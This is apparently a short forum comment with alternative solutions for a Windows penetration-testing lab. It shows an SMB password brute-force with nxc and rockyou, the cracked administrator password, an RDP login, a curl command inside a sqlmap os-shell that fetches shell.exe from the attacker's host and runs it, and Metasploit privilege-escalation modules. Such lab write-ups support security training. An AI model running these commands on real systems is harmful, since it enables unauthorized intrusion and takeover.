For target 1 there was an much easier way:
just bruteforce the password of the administrator and login as administrator.
┌──(kali㉿iml-kali)-[~/Desktop]
└─$ nxc smb 10.102.139.31 -u administrator -p /usr/share/wordlists/rockyou.txt
SMB 10.102.139.31 445 IML-WIN1018 [*] Windows 10 / Server 2016 Build 17134 x64 (name:IML-WIN1018) (domain:IML-Win1018) (signing:False) (SMBv1:False)
...
SMB 10.102.139.31 445 IML-WIN1018 [+] IML-Win1018\administrator:blink182
then RDP to the box:
xfreerdp /v:10.102.139.31 /u:administrator /p:blink182 /dynamic-resolution /cert-ignore +clipboard +drives /drive:root,/home/kali
so, there's no need to use the IMLuser. But I admit, that would generate a lot of noise :)
for target 2 in the os-shell of sqlmap you can also use curl to transfer the files:
> curl http://10.102.12.205:8000/shell.exe -o c:\users\iis-admin\shell.exe
> c:\users\iis-admin\shell.exe
and I've used the exploit-suggester and the module exploit/windows/local/ms16_075_reflection_juicy to successfully escalate my privileges.
same for target 3:
create a file with msfvenom and transfer it to the target. and let the exploit-suggester running to just find out that exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move works :)